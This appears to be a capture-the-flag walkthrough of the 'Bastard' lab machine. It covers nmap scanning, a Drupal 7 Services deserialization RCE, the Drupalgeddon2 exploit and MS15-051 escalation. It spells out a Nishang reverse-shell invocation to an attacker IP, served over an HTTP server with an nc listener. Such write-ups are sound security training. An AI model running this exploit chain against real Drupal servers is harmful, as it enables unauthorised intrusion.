Bastard
Reconnaissance:
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sC -sV -O 10.10.10.9
80/tcp open http Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-title: Welcome to Bastard | Bastard
135/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC┌──(kali㉿kali)-[~]
└─$ sudo nmap -sU -O 10.10.10.9
All 1000 scanned ports on 10.10.10.9 are in ignored states.We have three open ports.
Port 80: running Drupal 7
Port 135 & 49154: running Microsoft Windows RPC
I can also see that the website is running IIS 7.5, which is the default IIS for Windows 7 / Server 2008r2. I’ll also see the webserver is hosting Drupal 7.
Enumeration: Drupal TCP 80
Visit the web application in the browser.
It’s running Drupal which is is a free and open-source content management framework. Let’s look at the CHANGELOG to view the exact version.
Let’s try and find credentials to this application. I googled “default credentials drupal”, but I didn’t find anything useful. Next, I tried common credentials admin/admin, admin/password, etc. but was not able to log in.
When it is an off-the-shelf software, I usually don’t run a brute force attack on it because it probably has a lock out policy in place.
Searchsploit:
Next, run searchsploit.
Let’s view vulnerability number 41564.
It links to this, It seems to be a deserialization vulnerability that leads to Remote Code Execution (RCE). Looking at the code, it we see that it visit the path /rest_endpoint to conduct the exploit.
That path is not found on the box, however, if we simply change it to /rest it works!
So it is using the Services module. We’ll use this exploit to gain an initial foothold on the box.
Foothold:
Make the following changes to the exploit code.
Run the exploit.
Perfect! It created two files: session.json and user.json. View the content of user.json.
I can identify that hash as Drupal 7, and try to break it:
However, that was going to take about three days on my system, and I don’t really need the password at this point.
It gives us the hashed password of the admin user. We could run it through a password cracker, however, we don’t need to because the session.json file gives us a valid session cookie for the admin user.
Exploit: Ruby Script
On reading about Drupalgeddon2, it seems this is testing the vulnerability on a Drupal 8 specific path.
I’ll try the ruby script, searchsploit -m exploits/php/webapps/44449.rb. Now I’ll run it, and it returns the help, and a warning:
I’ll fix the warning about \r with dos2unix:
Shell: Nishang
I can upgrade this to a Nishang shell by grabbing a copy of Invoke-PowerShellTcp.ps1, adding a call to the function to the end, Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.14 -Port 443, and then serving that directory with python3 -m http.server 80. I’ll also open a nc listener on port 443.
Then I give this command to the Drupalgeddon2 shell:
My python webserver gets the request for shell.ps1 and sends it When shell.ps1 is run, it loads all the functions, and then invokes the reverse shell to me on port 443, which I get in nc:
Privesc : MS15-051
We use the command “whoami /priv” to check the privileges with our user and see that we have permissions to the privilege “SeImpersonatePrivilege“. We already know this one from other machines that we have solved, we know that we can impersonate the user “nt authority\system“.
As we can see, we are in a Windows Server 2008 R2, of which there are several kernel-level exploits that we could also use.
I’ll grab it from here:
Last updated